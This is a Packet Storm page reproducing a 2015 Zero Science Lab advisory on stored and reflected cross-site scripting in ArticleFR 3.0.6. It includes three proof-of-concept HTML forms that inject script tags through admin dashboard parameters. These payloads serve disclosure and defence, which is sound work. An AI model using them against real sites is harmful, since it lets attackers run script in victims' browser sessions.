what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

ArticleFR 3.0.6 Cross Site Scripting

ArticleFR 3.0.6 Cross Site Scripting
Posted Jul 14, 2015
Authored by LiquidWorm | Site zeroscience.mk

ArticleFR suffers from multiple stored cross site scripting vulnerabilities. The issues are triggered when input passed via the POST parameter 'name' in Categories, POST parameters 'title' and 'rel' in Links and GET parameter 'url' in PingServers module is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Version 3.0.6 is affected.

tags | exploit, arbitrary, vulnerability, xss
SHA-256 | 97577b9ace469f43b13d8ce2548ca3144fe75dccb6067e8bf74ca67d2b2dbe4f

ArticleFR 3.0.6 Cross Site Scripting

Change Mirror Download

ArticleFR 3.0.6 Multiple Script Injection Vulnerabilities


Vendor: Free Reprintables
Product web page: http://www.freereprintables.com
Affected version: 3.0.6

Summary: A lightweight fully featured content (article / video)
management system. Comes with a pluginable and multiple module
framework system.

Desc: ArticleFR suffers from multiple stored cross-site scripting
vulnerabilities. The issues are triggered when input passed via the
POST parameter 'name' in Categories, POST parameters 'title' and
'rel' in Links and GET parameter 'url' in PingServers module is
not properly sanitized before being returned to the user. This can
be exploited to execute arbitrary HTML and script code in a user's
browser session in context of an affected site.

Tested on: nginx/1.6.2
PHP


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2015-5247
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5247.php


21.06.2015

--


POST 'name' Categories Stored XSS:
----------------------------------
<html>
<body>
<form action="http://127.0.0.1/dashboard/settings/categories/" method="POST">
<input type="hidden" name="name" value='"><script>alert(1)</script>' />
<input type="hidden" name="parent" value="0" />
<input type="hidden" name="submit" value="Add" />
<input type="submit" value="XSS #1" />
</form>
</body>
</html>


POST 'title', 'rel' Links Stored XSS:
------------------------------------
<html>
<body>
<form action="http://127.0.0.1/dashboard/settings/links/" method="POST">
<input type="hidden" name="title" value='"><script>alert(2)</script>' />
<input type="hidden" name="url" value="http://www.zeroscience.mk" />
<input type="hidden" name="rel" value='"><script>alert(3)</script>' />
<input type="hidden" name="submit" value="Add" />
<input type="submit" value="XSS #2 and #3" />
</form>
</body>
</html>


POST 'url' Ping Server Reflected XSS:
-------------------------------------
<html>
<body>
<form action="http://127.0.0.1/dashboard/tools/pingservers/" method="POST">
<input type="hidden" name="url" value='http://www.zeroscience.mk"><script>alert(4)</script>' />
<input type="hidden" name="submit" value="Add" />
<input type="submit" value="XSS #4" />
</form>
</body>
</html>
Login or Register to add favorites

File Archive:

May 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    44 Files
  • 2
    May 2nd
    5 Files
  • 3
    May 3rd
    11 Files
  • 4
    May 4th
    0 Files
  • 5
    May 5th
    0 Files
  • 6
    May 6th
    28 Files
  • 7
    May 7th
    0 Files
  • 8
    May 8th
    0 Files
  • 9
    May 9th
    0 Files
  • 10
    May 10th
    0 Files
  • 11
    May 11th
    0 Files
  • 12
    May 12th
    0 Files
  • 13
    May 13th
    0 Files
  • 14
    May 14th
    0 Files
  • 15
    May 15th
    0 Files
  • 16
    May 16th
    0 Files
  • 17
    May 17th
    0 Files
  • 18
    May 18th
    0 Files
  • 19
    May 19th
    0 Files
  • 20
    May 20th
    0 Files
  • 21
    May 21st
    0 Files
  • 22
    May 22nd
    0 Files
  • 23
    May 23rd
    0 Files
  • 24
    May 24th
    0 Files
  • 25
    May 25th
    0 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close